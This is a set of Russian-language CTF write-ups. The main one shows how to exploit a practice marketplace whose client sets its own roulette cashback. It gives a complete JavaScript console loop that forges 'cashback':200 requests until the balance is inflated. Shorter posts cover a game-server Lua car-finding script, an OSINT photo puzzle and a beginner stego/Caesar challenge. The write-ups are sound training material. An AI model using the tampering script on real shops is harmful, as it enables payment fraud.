Ctf

Регистрируемся на соревновании и получаем список заданий.

Например, попробуем «расковырять» задание «Капибонус» самостоятельно.

Описание задания:

Простое демо-задание — пример того, с чем можно столкнуться в Лиге разработки на простой сложности.

Добро пожаловать в Капиплейс — новый маркетплейс города.

Здесь за покупки дают возможность крутануть колесо Фортуны и выиграть разные призы. Да только никто ничего не может выиграть, хоть и тратят много денег. Попахивает мошенничеством!

Выиграйте 313 337 ₡ и выкупите алгоритм колеса у супермаркета, чтобы впредь удача улыбалась каждому покупателю.

Перейдем по ссылке из личного кабинета — перед нами открылся обычный интернет-магазин. Регистрируемся.

Имеем следующие вводные:

Есть интернет-магазин, который дает приветственный бонус в виде 100 единиц для оплаты товаров.

При оплате есть возможность поучаствовать в розыгрыше и покрутить рулетку, которая предоставляет:

• возврат 200% от стоимости товара;

• вычитается с вашего счета минус 10%/20%/50% от стоимости товара;

• 0 — не выиграли, не проиграли.

Также мы видим товар с названием: «Алгоритм Колеса Фортуны». Как можно догадаться, нам необходимо выкупить данный товар для решения задания.

Из очевидных моментов — это возможность рассмотреть сам механизм начисления бонусов и понять, как можно увеличить наш стартовый баланс из 100 до необходимой суммы в 313 337 единиц благодаря данному розыгрышу.

Откроем консоль разработчика (F12), вкладку Network в режиме «Preserve log», чтобы история запросов сохранялась после обновления страницы.

Добавим какой-нибудь недорогой товар, чтобы средств хватило на большее количество тестов, и попробуем его приобрести.

Запрос для добавления товара:

POST https://{HOSTNAME}.spbctf.org/cart/add/119

body пустое

В качестве указателя товара используется идентификатор в GET — 119. Товары хранятся в сессии.

Попробуем приобрести товар: перейдем в корзину и нажмем на кнопку «Оплатить».

Для оформления заказа запрос уходит на метод:

POST https://{HOSTNAME}.spbctf.org/checkout

body пустое

После завершения с нас списываются средства, и нас переводит на страницу с номером заказа.

Далее нам предлагается поучаствовать в самой рулетке — нажимаем на кнопку «Покрутить!».

Мне повезло с первого раза: выпал кэшбэк на 200 процентов :)

Запрос рулетки:

POST https://{HOSTNAME}.spbctf.org/order/24140/set-cashback

BODY: {"cashback": 200}

И вот здесь стоит обратить внимание: в теле метода set-cashback мы видим указание на применяемый кэшбэк в 200.

Фактически сам кэшбэк рулетки определяется на стороне клиента (фронтенд), а затем уже сообщается серверу о том, какой результат выпал!

Так как мы можем влиять на запросы, которые от нас уходят, мы фактически можем подменять результаты всех розыгрышей на 200% кэшбэк.

Отлично, это уже способ нарастить баланс!

Попробуем расковырять его дальше и проверить, можем ли мы получить кэшбэк в размере, например, 20000%.

Повторяем операцию: добавляем товар и оформляем заказ.

При указании числа большего, чем 200, выдает статус 303, и кэшбэк не применяется.

Самый простой способ не удался — не получилось вписать большой процент, но рабочий механизм наращивания кэшбэка у нас уже есть.

Будем его использовать!

Наша задача — создать такое количество запросов, которое позволит нам получить баланс для оплаты товара на сумму 313 337.

Поехали: попробуем воспроизвести цикл добавления товара, оформления заказа и кэшбэка автоматически, чтобы не воспроизводить это дело руками.

Делать это будем там же, в консоли разработчика.

Запросы у нас уже есть в консоли — копируем их правой кнопкой мыши: «Copy as fetch».

Для реализации подобной логики потребуются небольшие знания программирования на JavaScript.

Сам запрос у нас уже есть — нужно составить цепочку запросов, которые идут друг за другом, и еще вытащить номер заказа для передачи следующему методу.

Давайте попробуем составить эту цепочку и выполнить в консоли.

Единственный момент: на самом сервисе магазина происходит редирект с HTTPS на HTTP, поэтому была добавлена опция в fetch: referrerPolicy: "unsafe-url", чтобы проигнорировать предупреждения браузера.

Вставляем все это дело в консоль разработчика и отправляем:

fetch("https://{HOSTNAME}.spbctf.org/cart/add/119", {

"headers": {

"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",

"accept-language": "ru-RU,ru;q=0.9",

"cache-control": "no-cache",

"content-type": "application/x-www-form-urlencoded"

},

"referrer": "https://{HOSTNAME}.spbctf.org/?sort_by=price&order=asc&page=8",

"referrerPolicy": "strict-origin-when-cross-origin",

"method": "POST",

"mode": "cors",

"credentials": "include", referrerPolicy: "unsafe-url"

}).then(function() {

let url = "https://{HOSTNAME}.spbctf.org/checkout";

fetch(url, {

"headers": {

"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",

"accept-language": "ru-RU,ru;q=0.9",

"cache-control": "no-cache",

"content-type": "application/x-www-form-urlencoded"

},

"referrer": "https://{HOSTNAME}.spbctf.org/cart",

"referrerPolicy": "strict-origin-when-cross-origin",

"method": "POST",

"mode": "cors",

"credentials": "include", referrerPolicy: "unsafe-url"

}).then(function(response) {

//здесь мы разбираем текущий url и получаем идентификатор заказа

var matches = response.url.match(/order\/(\d+)$/);

//далее этот идентификатор заказа используем для получения кэшбэка

fetch("https://{HOSTNAME}.spbctf.org/order/" + matches[1] + "/set-cashback", {

"headers": {

"accept": "*/*",

"accept-language": "ru-RU,ru;q=0.9",

"cache-control": "no-cache",

"content-type": "application/json"

},

"referrer": "https://{HOSTNAME}.spbctf.org/order/23714",

"referrerPolicy": "strict-origin-when-cross-origin",

"body": "{\"cashback\":200}",

"method": "POST",

"mode": "cors",

"credentials": "include", referrerPolicy: "unsafe-url"

});

})

})

Отлично, баланс изменяется автоматически после каждого выполнения кода в консоли.

Обновим товар на более дорогой, чтобы получать больший кэшбэк.

В строке добавления в корзину меняем 119 на ID нужного товара.

fetch("https://{HOSTNAME}.spbctf.org/cart/add/119"

Посмотреть идентификатор товара можно через вкладку Network при добавлении товара либо через Elements в консоли разработчика (ПКМ на кнопке «Купить» → «Просмотреть код»).

Теперь автоматизируем отправку запросов в цикле, чтобы не вызывать их вручную.

Добавим цикл и сделаем так, чтобы запросы выполнялись последовательно. Для этого используем async/await.

Итоговый код:

for (let i = 0; i < 9; i++) {

await fetch("https://{HOSTNAME}.spbctf.org/cart/add/124", {

"headers": {

"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",

"accept-language": "ru-RU,ru;q=0.9",

"cache-control": "no-cache",

"content-type": "application/x-www-form-urlencoded"

},

"referrer": "https://{HOSTNAME}.spbctf.org/?sort_by=price&order=asc&page=8",

"referrerPolicy": "strict-origin-when-cross-origin",

"method": "POST",

"mode": "cors",

"credentials": "include", referrerPolicy: "unsafe-url"

}).then(async function() {

let url = "https://{HOSTNAME}.spbctf.org/checkout";

await fetch(url, {

"headers": {

"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",

"accept-language": "ru-RU,ru;q=0.9",

"cache-control": "no-cache",

"content-type": "application/x-www-form-urlencoded"

},

"referrer": "https://{HOSTNAME}.spbctf.org/cart",

"referrerPolicy": "strict-origin-when-cross-origin",

"method": "POST",

"mode": "cors",

"credentials": "include", referrerPolicy: "unsafe-url"

}).then(async function(response) {

console.log(response);

//здесь мы разбираем текущий url и получаем идентификатор заказа

var matches = response.url.match(/order\/(\d+)$/);

//далее этот идентификатор заказа используем для получения кэшбэка

await fetch("https://{HOSTNAME}.spbctf.org/order/" + matches[1] + "/set-cashback", {

"headers": {

"accept": "*/*",

"accept-language": "ru-RU,ru;q=0.9",

"cache-control": "no-cache",

"content-type": "application/json"

},

"referrer": "https://{HOSTNAME}.spbctf.org/order/23714",

"referrerPolicy": "strict-origin-when-cross-origin",

"body": "{\"cashback\":200}",

"method": "POST",

"mode": "cors",

"credentials": "include", referrerPolicy: "unsafe-url"

});

});

});

}

На выходе получаем конструкцию, которая позволяет наращивать баланс благодаря уязвимости в механизме кэшбэка.

Когда баланс достигает 313 337 ₡, покупаем товар «Алгоритм Колеса Фортуны», получаем ключ и вводим его в личном кабинете CTF.

Задание выполнено!

Подписывайтесь на мой Телеграм канал: https://t.me/+LWoSqRG4ZRk0ZTcy

На первый взгляд не очень понятно что надо сделать и где начинать искать. Но давайте начнем по порядку. В тексте задания упоминается какая то локация Bone Country, если погуглить, то станет понятно что это локация из игры Grand Theft Auto: San Andreas.

У GTA:SA есть мультиплеерная составляющая - SAMP. Неужели это отдельный игровой сервер где надо найти ctf флаг? Да, это он. Ah shit, here we go again

И так, у нас есть игровой сервер с кучей машин, но нам надо найти одну единственную. Из описания задания у нас есть подсказка, что машина имеет инфернальное название. Если посмотреть список техники из GTA:SA, то можно найти машину с названием Infernus, ну собственно она нам и нужна.

Теперь остается вопрос, где ее искать на такой большой площади? Если вы вдруг знакомы с лором и пасхалками из GTA:SA, то наверняка поняли эту отсылку про инопланетян.

Собственно в Bone Country только 2 места связанных с НЛО, это военная база и придорожная закусочная с летающей тарелкой. Ну собственно место для поиска понятно. Но это слишком просто, а задание помечено как среднее, значит давайте решим его более сложным способом.

Представим, что вы нормальный, адекватный человек и никогда не играли в GTA и все это время тратили с пользой для общества. Мы можем написать скрипт, который будет опрашивать всю технику в поле загрузки игрока и искать необходимую машину. Благо, за все это время в для GTA:SA был разработан мод MoonLoader, который позволяет загружать свои lua-скрипты.

И так, нам понадобится, сам MoonLoader, библиотека SAMPFUNC, версия SAMP 0.3.7-R3(Это важно) и версия GTA:SA v1.0.0 US(Это тоже важно)

И если после установки вы видите такой загрузочный экран, значит все установлено верно

Тогда приступим к написанию скрипта

wm = require 'windows.message'

font_flag = require('moonloader').font_flag

font = renderCreateFont('Arial', 11, font_flag.SHADOW + font_flag.BOLD)

local infernusModelId = 411 -- ID модели Infernus в GTA:SA

local vrender = false -- переменная для переключения отображения

function main()

if not isSampLoaded() or not isSampfuncsLoaded() then return end

while not isSampAvailable() do wait(0) end

addEventHandler('onWindowMessage', function(msg, wparam, lparam)

if msg == wm.WM_KEYDOWN or msg == wm.WM_SYSKEYDOWN then

if wparam == VK_F3 then

vrender = not vrender

end

end

end)

while true do

wait(0)

if vrender then

local vehicles = getAllVehicles() -- Получаем список всех транспортных средств в игре

for i, vehicle in ipairs(vehicles) do

if getCarModel(vehicle) == infernusModelId and isCarOnScreen(vehicle) then

displayInfernusInfo(vehicle) -- Отображение информации о Infernus

end

end

end

end

end

function displayInfernusInfo(vehicle)

-- Получаем координаты транспортного средства

local cx, cy, cz = getCarCoordinates(vehicle)

-- Конвертируем координаты в позицию на экране

local x, y = convert3DCoordsToScreen(cx, cy, cz)

-- Строка, которую хотим отобразить

local model = "Infernus (" .. tostring(getCarModel(vehicle)) .. ')'

-- Получаем длину и высоту текста для отрисовки

local length = renderGetFontDrawTextLength(font, model, true)

local height = renderGetFontDrawHeight(font)

-- Установим цвет текста

local textcolor = 0xFF00B811 -- Зелёный

if getCarDoorLockStatus(vehicle) == 2 then

textcolor = 0xFFEC0000 -- Красный, если двери заблокированы

end

-- Отрисовываем текст

renderFontDrawText(font, model, x - (length + 5) / 2, y - (height + 7) / 2, textcolor, true)

end

И так, скрипт готов. Скрипт активируется на клавишу F3. Сохраняем его в папку и заходим на сервер. Быстрее всего будет найти машину с воздуха, поэтому отправляемся в аэропорт Las Venturas и садимся в вертолет. Убеждаемся что наш скрипт работает, так как Infernus рядом с аэропортом прекрасно виден.

Начинаем облетать заданную локацию с севера на юг и в скором времени заметим Infernus помеченный красной надписью, а это значит что двери авто заблокированы, чтобы авто не угнали.

Похоже это наш пациент. Подходим к нему ближе и да, это он, а сверху флаг. Осталось только вбить его в форму и задание выполнено

Всем спасибо за внимание.

Всем привет! Продолжаю делать CTF по OSINT. Для этих квестов я ищу определенные фотографии, на примере которых можно продемонстрировать принципы действия геопространственной разведки и поиск информации по открытым источникам. Иногда я понимаю, что фотография может заключать в себе слишком много ключей, на отработку которых может уйти не один час, а потом я вспоминаю, что международные расследователи в таких случаях успешно используют краудсорсинг, чаще всего твиттер. С твиттером сейчас непонятно, а пикабу мне очень помог в разборе прошлой задачи на поиск локации: Помогите определить местность на фото тогда её решили менее чем за сутки, поэтому я решил попробовать ещё раз)

P.S. Я уже нашёл много информации по этой фотографии, но я уверен, что такие задачи развивают насмотренность и тренируют информационную грамотность, поэтому не буду светить всё что я нашёл, но здесь будет достаточно информации для старта.

Задача:
Определить точное направление съёмки и показать его на карте.

Точка старта:
Если с десктопа, кликните правой клавишей мыши по картинке >> поиск изображения гугл >> найти источник изображения >> ссылка на оригинал изображения >> Flickr. Добро пожаловать в Latvijas armija. Как отследить военный патрульный катер P-8 типа «Jelgava» подсказывать не буду)

Подсказка: правило 20 вопросов.
Если не знаете, на что обращать внимание, задайте 20 вопросов из разряда: что это за номер там на панели, причём тут город Елгава, и даст ли вам что-нибудь вид за окном. Может быть, именно 20 вопросов и не наберется, зато вы точно будете знать, что не пропустили ни одного ключа.

Подсказка 2:
Чтобы успешнее искать окружение через обратный поиск по изображению, можно вырезать и улучшить отдельный кусок фотографии

⚠️ @iTokado взял флаг менее чем за час после публикации задачи.

Много времени прохождение не потребует, если вы опытный игрок. А вот для начинающих- самое то. Присутствуют в игре основные дисциплины (стеганография, криптография и т.д.) для поиска флагов-подсказок. Спойлерить заранее не буду. Рассмотрим здесь прохождение нескольких уровней. Итак, жмём ссылку

https://2hash.ru/ctf/a8802331696f7a2f3ab7fe861206ee9c

Попадаем на страницу со странным изображением и не менее странным текстом. Подсказка в названии уровня. "Что в коробке?" Сохраняем картинку, видим, что у неё расширение .jpg

Гуглим как спрятать что-то в картинку. Узнаём, что можно склеить zip-архив и jpg-картинку. Пробуем изменить расширение на .zip. Открываем архив, видим текстовый файл с подсказкой, что ключ для следующего уровня равен 13. И саму ссылку на следующий уровень:

Читаем название уровня и описание. Думаем. Видим строчку с тарабарщиной. Понимаем, что речь идёт о шифре Цезаря. Ключ=сдвиг=13. Гуглим онлайн-дешифровщик этого метода. Тут надо заострить ваше внимание на инструментах. Если играем в русскую версию, то, соответственно, нужно искать дешифровщик кириллицы, например

https://calculatorium.ru/cryptography/caesar-cipher.

Если же играем на английском, то тут понадобится "швейцарский нож", отлично

себя зарекомендовавший у игроков CTF. Речь идёт о сайте https://www.dcode.fr/

Он изначально на французском, но есть встроенная функция выбора языка. Пишем в строке поиска слово "caesar", вставляем в большое пустое поле нашу тарабарщину, жмём кнопку, находящуюся ниже. В поле слева видим расшифрованное послание. Причём первый столбец - сдвиг, второй - расшифрованное сообщение. На этом прервусь, дальше пробуйте сами.

Если застрянете - в комментах дам наводку на прохождение.

Удачи!